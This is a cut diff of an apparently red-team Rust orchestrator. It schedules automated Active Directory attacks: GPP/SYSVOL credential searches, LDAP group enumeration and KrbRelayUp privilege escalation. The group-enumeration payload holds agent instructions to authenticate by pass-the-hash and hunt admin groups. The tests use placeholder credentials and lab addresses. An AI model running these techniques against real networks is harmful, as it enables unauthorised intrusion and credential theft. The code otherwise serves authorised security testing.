dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "GPP/SYSVOL credential search dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GPP_SYSVOL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GPP_SYSVOL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "GPP/SYSVOL task deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch GPP/SYSVOL search"); + } + } + } + } +} + +struct GppSysvolWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("gpp:{}", "contoso.local"); + assert_eq!(key, "gpp:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GPP_SYSVOL, "gpp_sysvol"); + } + + #[test] + fn payload_contains_both_techniques() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "techniques": ["gpp_password_finder", "sysvol_script_search"], + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + let techniques = payload["techniques"].as_array().unwrap(); + assert_eq!(techniques.len(), 2); + assert_eq!(techniques[0], "gpp_password_finder"); + assert_eq!(techniques[1], "sysvol_script_search"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = GppSysvolWork { + dedup_key: "gpp:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dedup_key, "gpp:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("gpp:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "gpp:contoso.local"); + } + + #[test] + fn two_tasks_per_domain() { + // The payload dispatches two techniques in a single submission per domain + let techniques = ["gpp_password_finder", "sysvol_script_search"]; + assert_eq!(techniques.len(), 2); + } + + // --- collect_gpp_sysvol_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dc_with_matching_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "gpp:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_GPP_SYSVOL, "gpp:contoso.local".into()); + let work = collect_gpp_sysvol_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_falls_back_to_first_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fabuser"); + } + + #[test] + fn collect_multiple_domains_produces_multiple_work() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + state + .credentials + .push(make_cred("fabadmin", "fabrikam.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_cred("fabuser", "fabrikam.local")); + state + .credentials + .push(make_cred("conuser", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "conuser"); + } + + #[test] + fn collect_case_insensitive_domain_match() { + let mut state = StateInner::new("test".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_gpp_sysvol_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "gpp:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("gpp:{}", "contoso.local"); + let key2 = format!("gpp:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } +} diff --git a/ares-cli/src/orchestrator/automation/group_enumeration.rs b/ares-cli/src/orchestrator/automation/group_enumeration.rs new file mode 100644 index 00000000..43723890 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/group_enumeration.rs @@ -0,0 +1,615 @@ +//! auto_group_enumeration -- enumerate domain groups and memberships via LDAP. +//! +//! Dispatches per-domain LDAP group enumeration to discover security groups, +//! their members, and cross-domain memberships. This covers a large gap in +//! attack surface mapping — group membership determines ACL attack paths, +//! privilege escalation chains, and cross-domain lateral movement. +//! +//! The recon agent queries `(objectCategory=group)` and resolves membership +//! recursively, including Foreign Security Principals for cross-domain groups. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect group enumeration work items from current state. +/// +/// Pure logic extracted from `auto_group_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_group_enum_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + let all_dcs = state.all_domains_with_dcs(); + if all_dcs.is_empty() { + return Vec::new(); + } + debug!( + domains = ?all_dcs.iter().map(|(d,_)| d.as_str()).collect::>(), + trusted = ?state.trusted_domains.keys().collect::>(), + creds = state.credentials.len(), + hashes = state.hashes.len(), + "Group enum state check" + ); + for (domain, dc_ip) in &all_dcs { + // Use separate dedup keys for cred vs hash attempts so a failed + // password-based attempt (e.g., mislabeled credential domain) + // doesn't permanently block the hash-based path. + let dedup_key_cred = format!("group_enum:{}:cred", domain.to_lowercase()); + let dedup_key_hash = format!("group_enum:{}:hash", domain.to_lowercase()); + let dedup_key_trust = format!("group_enum:{}:trust", domain.to_lowercase()); + + // Prefer same-domain cleartext cred, then fall back to trust-compatible + // cred (child→parent or cross-forest). Trust-based attempts use a + // separate dedup key so they don't block hash-based fallback. + let (cred, using_trust_cred) = + if !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred) { + let c = state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .cloned(); + (c, false) + } else { + (None, false) + }; + let (cred, using_trust_cred) = + if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust) { + match state.find_trust_credential(domain) { + Some(c) => (Some(c), true), + None => (None, using_trust_cred), + } + } else { + (cred, using_trust_cred) + }; + + // Look for NTLM hash (PTH) — fires independently of cred attempt + let (ntlm_hash, ntlm_hash_username) = + if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash) { + state + .hashes + .iter() + .find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.username.to_lowercase() == "administrator" + }) + .or_else(|| { + state.hashes.iter().find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&h.username) + }) + }) + .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone()))) + .unwrap_or((None, None)) + } else { + (None, None) + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + debug!( + domain = %domain, + cred_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred), + trust_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust), + hash_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash), + "Group enum: no credential/hash found for domain" + ); + continue; + } + + let dedup_key = if ntlm_hash.is_some() { + dedup_key_hash + } else if using_trust_cred { + dedup_key_trust + } else { + dedup_key_cred + }; + + items.push(GroupEnumWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain: domain.clone(), + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + ntlm_hash, + ntlm_hash_username, + }); + } + + items +} + +/// Dispatches group enumeration per domain. +/// Interval: 45s. +pub async fn auto_group_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(20)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("group_enumeration") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_group_enum_work(&state) + }; + + if !work.is_empty() { + info!( + count = work.len(), + domains = ?work.iter().map(|w| w.domain.as_str()).collect::>(), + "Group enumeration work items collected" + ); + } + for item in work { + // When PTH hash is available, use the hash user's identity for the target domain + // instead of a cross-domain credential that will fail LDAP simple bind. + let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() { + ( + item.ntlm_hash_username + .clone() + .unwrap_or_else(|| item.credential.username.clone()), + String::new(), // empty password forces PTH path + item.domain.clone(), // target domain, not cross-domain + ) + } else { + ( + item.credential.username.clone(), + item.credential.password.clone(), + item.credential.domain.clone(), + ) + }; + let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description", "cn" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + "instructions": concat!( + "Enumerate ALL security groups in this domain.\n\n", + "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ", + "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n", + " Use rpcclient_command with the hash parameter: rpcclient_command(target=dc_ip, ", + "username=user, domain=domain, hash=, command='enumdomgroups') — ", + "then for each group RID: 'querygroupmem ' and 'queryuser ' to resolve members.\n", + " IMPORTANT: Pass the hash via the 'hash' parameter, NOT as the password.\n\n", + "If a password IS provided, use ldap_search with filter (objectCategory=group) ", + "to enumerate groups, members, and Foreign Security Principals.\n\n", + "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain ", + "(e.g. credential from child.domain.local querying parent domain.local), ", + "you MUST pass bind_domain= to ldap_search. ", + "Check the 'bind_domain' field in the task payload — if present, always pass it ", + "to ldap_search so the LDAP bind uses user@bind_domain while querying the target domain.\n\n", + "For EACH group found, report it as a vulnerability:\n", + " vuln_type: 'group_enumerated'\n", + " target: the group sAMAccountName\n", + " target_ip: the DC IP\n", + " domain: the domain\n", + " details: {\"group_type\": \"Global/DomainLocal/Universal\", ", + "\"members\": [\"user1\", \"user2\"], \"managed_by\": \"manager\", ", + "\"admin_count\": true/false}\n\n", + "Pay special attention to: Domain Admins, Enterprise Admins, Administrators, ", + "Backup Operators, Server Operators, Account Operators, DnsAdmins, ", + "and any custom groups with adminCount=1.\n\n", + "Report cross-domain memberships as vuln_type='foreign_group_membership'.\n\n", + "IMPORTANT: For each user found, include in discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}" + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + // Attach NTLM hash for PTH when no cleartext cred for target domain + if let Some(ref hash) = item.ntlm_hash { + payload["ntlm_hash"] = json!(hash); + } + if let Some(ref user) = item.ntlm_hash_username { + payload["hash_username"] = json!(user); + } + + let priority = dispatcher.effective_priority("group_enumeration"); + match dispatcher + .force_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Group enumeration dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GROUP_ENUMERATION, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GROUP_ENUMERATION, &item.dedup_key) + .await; + } + Ok(None) => { + info!(domain = %item.domain, dc = %item.dc_ip, "Group enumeration deferred by throttler"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch group enumeration"); + } + } + } + } +} + +struct GroupEnumWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key_cred = format!("group_enum:{}:cred", "contoso.local"); + let key_hash = format!("group_enum:{}:hash", "contoso.local"); + assert_eq!(key_cred, "group_enum:contoso.local:cred"); + assert_eq!(key_hash, "group_enum:contoso.local:hash"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GROUP_ENUMERATION, "group_enumeration"); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description", "cn" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + }); + assert_eq!(payload["technique"], "ldap_group_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert!(payload["enumerate_members"].as_bool().unwrap()); + assert!(payload["resolve_foreign_principals"].as_bool().unwrap()); + } + + #[test] + fn ldap_attributes_list() { + let attrs = [ + "sAMAccountName", + "member", + "memberOf", + "managedBy", + "groupType", + "objectSid", + "description", + "cn", + ]; + assert_eq!(attrs.len(), 8); + assert!(attrs.contains(&"sAMAccountName")); + assert!(attrs.contains(&"objectSid")); + assert!(attrs.contains(&"managedBy")); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = GroupEnumWork { + dedup_key: "group_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + ntlm_hash: None, + ntlm_hash_username: None, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("group_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "group_enum:contoso.local"); + } + + #[test] + fn dedup_keys_differ_per_domain() { + let key1 = format!("group_enum:{}:cred", "contoso.local"); + let key2 = format!("group_enum:{}:cred", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn collect_hash_fires_after_cred_dedup_burned() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Cred-based attempt already dispatched (may have failed) + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:cred".into(), + ); + // Add an NTLM hash — should still generate work via hash path + state.hashes.push(ares_core::models::Hash { + id: "h1".into(), + username: "Administrator".into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0".into(), + hash_type: "ntlm".into(), + domain: "contoso.local".into(), + source: "secretsdump".into(), + cracked_password: None, + discovered_at: None, + parent_id: None, + aes_key: None, + attack_step: 0, + }); + let work = collect_group_enum_work(&state); + assert_eq!( + work.len(), + 1, + "hash path should fire even after cred dedup burned" + ); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:hash"); + assert!(work[0].ntlm_hash.is_some()); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:cred".into(), + ); + state.mark_processed( + DEDUP_GROUP_ENUMERATION, + "group_enum:contoso.local:hash".into(), + ); + let work = collect_group_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_cred_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred — should NOT fall back cross-domain (burns dedup slot) + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 0, "cross-domain cred should not produce work"); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:cred"); + } + + #[test] + fn collect_prefers_same_domain_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("localadmin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "localadmin"); + } + + #[test] + fn collect_child_cred_falls_back_for_parent_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Child-domain cred should work for parent-domain via trust + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "north.contoso.local")); // pragma: allowlist secret + let work = collect_group_enum_work(&state); + assert_eq!( + work.len(), + 1, + "child-domain cred should fall back for parent" + ); + assert_eq!(work[0].dedup_key, "group_enum:contoso.local:trust"); + assert_eq!(work[0].credential.domain, "north.contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_group_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } +} diff --git a/ares-cli/src/orchestrator/automation/krbrelayup.rs b/ares-cli/src/orchestrator/automation/krbrelayup.rs new file mode 100644 index 00000000..39c17801 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/krbrelayup.rs @@ -0,0 +1,527 @@ +//! auto_krbrelayup -- exploit KrbRelayUp when LDAP signing is not enforced. +//! +//! KrbRelayUp abuses Kerberos authentication relay to LDAP when LDAP signing +//! is not required. It creates a computer account (MAQ > 0), relays Kerberos +//! auth to LDAP to set up RBCD on a target, then uses S4U2Self/S4U2Proxy +//! to get a service ticket as admin. This is a local privilege escalation +//! that works from any authenticated domain user to SYSTEM on domain-joined hosts. +//! +//! Prereqs: LDAP signing NOT enforced (checked by auto_ldap_signing), +//! MAQ > 0 (checked by auto_machine_account_quota), valid domain creds. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect KrbRelayUp work items from current state. +/// +/// Pure logic extracted from `auto_krbrelayup` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_krbrelayup_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + // Check if any DC has LDAP signing disabled (vuln registered by auto_ldap_signing) + let has_ldap_weak = state.discovered_vulnerabilities.values().any(|v| { + let vtype = v.vuln_type.to_lowercase(); + vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required" + }); + + if !has_ldap_weak { + return Vec::new(); + } + + let mut items = Vec::new(); + + // Target non-DC hosts (priv esc on member servers) + for host in &state.hosts { + if host.is_dc { + continue; + } + + // Skip hosts we already own + if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) { + continue; + } + + let dedup_key = format!("krbrelayup:{}", host.ip); + if state.is_processed(DEDUP_KRBRELAYUP, &dedup_key) { + continue; + } + + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(KrbRelayUpWork { + dedup_key, + target_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +/// Dispatches KrbRelayUp exploitation against hosts when LDAP signing is weak. +/// Interval: 45s. +pub async fn auto_krbrelayup(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("krbrelayup") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_krbrelayup_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "krbrelayup", + "target_ip": item.target_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("krbrelayup"); + match dispatcher + .throttled_submit("privesc", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %item.target_ip, + hostname = %item.hostname, + "KrbRelayUp exploitation dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_KRBRELAYUP, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_KRBRELAYUP, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "KrbRelayUp deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch KrbRelayUp"); + } + } + } + } +} + +struct KrbRelayUpWork { + dedup_key: String, + target_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host, VulnerabilityInfo}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + fn make_ldap_vuln() -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: "ldap-weak-1".into(), + vuln_type: "ldap_signing_disabled".into(), + target: "192.168.58.10".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: Default::default(), + recommended_agent: String::new(), + priority: 5, + } + } + + // --- collect_krbrelayup_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_ldap_vuln_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_dc_host_with_ldap_vuln_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "krbrelayup:192.168.58.30"); + } + + #[test] + fn collect_skips_dc_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), make_ldap_vuln()); + let work = collect_krbrelayup_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.30", "srv01.contoso.local", false)); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .discovered_vulnerabilities + .insert("v1".into(), 